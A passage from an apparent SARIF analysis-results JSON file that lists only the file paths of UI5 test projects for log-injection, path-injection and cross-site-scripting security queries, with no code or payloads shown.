"index":360}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":361}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package-lock.json","uriBaseId":"%SRCROOT%","index":362}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/package.json","uriBaseId":"%SRCROOT%","index":363}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/ui5.yaml","uriBaseId":"%SRCROOT%","index":364}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":365}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/index.html","uriBaseId":"%SRCROOT%","index":366}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/index.js","uriBaseId":"%SRCROOT%","index":367}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":368}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":369}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package-lock.json","uriBaseId":"%SRCROOT%","index":370}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/package.json","uriBaseId":"%SRCROOT%","index":371}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/ui5.yaml","uriBaseId":"%SRCROOT%","index":372}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":373}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":374}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/index.html","uriBaseId":"%SRCROOT%","index":375}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/index.js","uriBaseId":"%SRCROOT%","index":376}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":377}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/package-lock.json","uriBaseId":"%SRCROOT%","index":378}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":379}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/package.json","uriBaseId":"%SRCROOT%","index":380}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/ui5.yaml","uriBaseId":"%SRCROOT%","index":381}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":382}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":383}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/index.html","uriBaseId":"%SRCROOT%","index":384}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/index.js","uriBaseId":"%SRCROOT%","index":385}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":386}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":387}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/package-lock.json","uriBaseId":"%SRCROOT%","index":388}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/package.json","uriBaseId":"%SRCROOT%","index":389}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/ui5.yaml","uriBaseId":"%SRCROOT%","index":390}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":391}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/index.html","uriBaseId":"%SRCROOT%","index":392}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/index.js","uriBaseId":"%SRCROOT%","index":393}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":394}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":395}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/.eslintrc.json","uriBaseId":"%SRCROOT%","index":396}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/package-lock.json","uriBaseId":"%SRCROOT%","index":397}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/package.json","uriBaseId":"%SRCROOT%","index":398}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/ui5.yaml","uriBaseId":"%SRCROOT%","index":399}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/Component.js","uriBaseId":"%SRCROOT%","index":400}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js","uriBaseId":"%SRCROOT%","index":401}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js","uriBaseId":"%SRCROOT%","index":402}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/index.html","uriBaseId":"%SRCROOT%","index":403}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":404}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/model/todoitems.json","uriBaseId":"%SRCROOT%","index":405}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/AllJourneys.js","uriBaseId":"%SRCROOT%","index":406}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/FilterJourney.js","uriBaseId":"%SRCROOT%","index":407}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/SearchJourney.js","uriBaseId":"%SRCROOT%","index":408}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/TodoListJourney.js","uriBaseId":"%SRCROOT%","index":409}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/arrangements/Startup.js","uriBaseId":"%SRCROOT%","index":410}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/opaTests.qunit.html","uriBaseId":"%SRCROOT%","index":411}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/opaTests.qunit.js","uriBaseId":"%SRCROOT%","index":412}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/pages/App.js","uriBaseId":"%SRCROOT%","index":413}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/testsuite.qunit.html","uriBaseId":"%SRCROOT%","index":414}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/testsuite.qunit.js","uriBaseId":"%SRCROOT%","index":415}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/AllTests.js","uriBaseId":"%SRCROOT%","index":416}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/controller/App.controller.js","uriBaseId":"%SRCROOT%","index":417}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/unitTests.qunit.html","uriBaseId":"%SRCROOT%","index":418}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/unitTests.qunit.js","uriBaseId":"%SRCROOT%","index":419}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/util/Helper.js","uriBaseId":"%SRCROOT%","index":420}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/view/App.view.xml","uriBaseId":"%SRCROOT%","index":421}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/package-lock.json","uriBaseId":"%SRCROOT%","index":422}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/package.json","uriBaseId":"%SRCROOT%","index":423}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/ui5.yaml","uriBaseId":"%SRCROOT%","index":424}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":425}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":426}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/index.html","uriBaseId":"%SRCROOT%","index":427}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/index.js","uriBaseId":"%SRCROOT%","index":428}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":429}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":430}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/package-lock.json","uriBaseId":"%SRCROOT%","index":431}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/package.json","uriBaseId":"%SRCROOT%","index":432}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/ui5.yaml","uriBaseId":"%SRCROOT%","index":433}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":434}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":435}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/index.html","uriBaseId":"%SRCROOT%","index":436}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/index.js","uriBaseId":"%SRCROOT%","index":437}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":438}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":439}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/package-lock.json","uriBaseId":"%SRCROOT%","index":440}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/ui5.yaml","uriBaseId":"%SRCROOT%","index":441}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":442}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":443}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/package.json","uriBaseId":"%SRCROOT%","index":444}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/index.html","uriBaseId":"%SRCROOT%","index":445}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/index.js","uriBaseId":"%SRCROOT%","index":446}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":447}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":448}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/package-lock.json","uriBaseId":"%SRCROOT%","index":449}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/package.json","uriBaseId":"%SRCROOT%","index":450}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/ui5.yaml","uriBaseId":"%SRCROOT%","index":451}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":452}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":453}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/index.html","uriBaseId":"%SRCROOT%","index":454}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/index.js","uriBaseId":"%SRCROOT%","index":455}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":456}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":457}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/package-lock.json","uriBaseId":"%SRCROOT%","index":458}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/package.json","uriBaseId":"%SRCROOT%","index":459}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/ui5.yaml","uriBaseId":"%SRCROOT%","index":460}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":461}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":462}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/index.html","uriBaseId":"%SRCROOT%","index":463}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/index.js","uriBaseId":"%SRCROOT%","index":464}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":465}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":466}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/package-lock.json","uriBaseId":"%SRCROOT%","index":467}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/package.json","uriBaseId":"%SRCROOT%","index":468}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/ui5.yaml","uriBaseId":"%SRCROOT%","index":469}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":470}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/index.html","uriBaseId":"%SRCROOT%","index":471}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/index.js","uriBaseId":"%SRCROOT%","index":472}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":473}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":474}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/package-lock.json","uriBaseId":"%SRCROOT%","index":475}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/package.json","uriBaseId":"%SRCROOT%","index":476}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/ui5.yaml","uriBaseId":"%SRCROOT%","index":477}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/Component.js","uriBaseId":"%SRCROOT%","index":478}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App1.controller.js","uriBaseId":"%SRCROOT%","index":479}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App2.controller.js","uriBaseId":"%SRCROOT%","index":480}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App3.controller.js","uriBaseId":"%SRCROOT%","index":481}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App4.controller.js","uriBaseId":"%SRCROOT%","index":482}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":483}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/index.html","uriBaseId":"%SRCROOT%","index":484}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/index.js","uriBaseId":"%SRCROOT%","index":485}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":486}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/view/App1.view.xml","uriBaseId":"%SRCROOT%","index":487}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/view/App2.view.xml","uriBaseId":"%SRCROOT%","index":488}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/view/App3.view.xml","uriBaseId":"%SRCROOT%","index":489}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/view/App4.view.xml","uriBaseId":"%SRCROOT%","index":490}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":491}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/package-lock.json","uriBaseId":"%SRCROOT%","index":492}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/package.json","uriBaseId":"%SRCROOT%","index":493}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/ui5.yaml","uriBaseId":"%SRCROOT%","index":494}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":495}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/index.html","uriBaseId":"%SRCROOT%","index":496}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/index.js","uriBaseId":"%SRCROOT%","index":497}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":498}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":499}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/package-lock.json","uriBaseId":"%SRCROOT%","index":500}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/package.json","uriBaseId":"%SRCROOT%","index":501}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/ui5.yaml","uriBaseId":"%SRCROOT%","index":502}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":503}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/index.html","uriBaseId":"%SRCROOT%","index":504}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/index.js","uriBaseId":"%SRCROOT%","index":505}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":506}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":507}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/package-lock.json","uriBaseId":"%SRCROOT%","index":508}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/package.json","uriBaseId":"%SRCROOT%","index":509}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/ui5.yaml","uriBaseId":"%SRCROOT%","index":510}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":511}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/index.html","uriBaseId":"%SRCROOT%","index":512}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/index.js","uriBaseId":"%SRCROOT%","index":513}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":514}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":515}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/package-lock.json","uriBaseId":"%SRCROOT%","index":516}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/package.json","uriBaseId":"%SRCROOT%","index":517}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/ui5.yaml","uriBaseId":"%SRCROOT%","index":518}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":519}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/controller/model.json","uriBaseId":"%SRCROOT%","index":520}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/index.html","uriBaseId":"%SRCROOT%","index":521}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/index.js","uriBaseId":"%SRCROOT%","index":522}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":523}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":524}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/package-lock.json","uriBaseId":"%SRCROOT%","index":525}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/package.json","uriBaseId":"%SRCROOT%","index":526}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/ui5.yaml","uriBaseId":"%SRCROOT%","index":527}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":528}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/index.html","uriBaseId":"%SRCROOT%","index":529}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/index.js","uriBaseId":"%SRCROOT%","index":530}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":531}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html","uriBaseId":"%SRCROOT%","index":532}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package-lock.json","uriBaseId":"%SRCROOT%","index":533}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package.json","uriBaseId":"%SRCROOT%","index":534}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/ui5.yaml","uriBaseId":"%SRCROOT%","index":535}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssBase.js","uriBaseId":"%SRCROOT%","index":536}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":537}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssRenderer.js","uriBaseId":"%SRCROOT%","index":538}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":539}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/index.html","uriBaseId":"%SRCROOT%","index":540}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/index.js","uriBaseId":"%SRCROOT%","index":541}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":542}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":543}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/package-lock.json","uriBaseId":"%SRCROOT%","index":544}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/package.json","uriBaseId":"%SRCROOT%","index":545}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/ui5.yaml","uriBaseId":"%SRCROOT%","index":546}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":547}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/index.html","uriBaseId":"%SRCROOT%","index":548}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/index.js","uriBaseId":"%SRCROOT%","index":549}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":550}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js","uriBaseId":"%SRCROOT%","index":551}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/package-lock.json","uriBaseId":"%SRCROOT%","index":552}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/package.json","uriBaseId":"%SRCROOT%","index":553}},{"location":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/ui5.yaml","uriBaseId":"%SR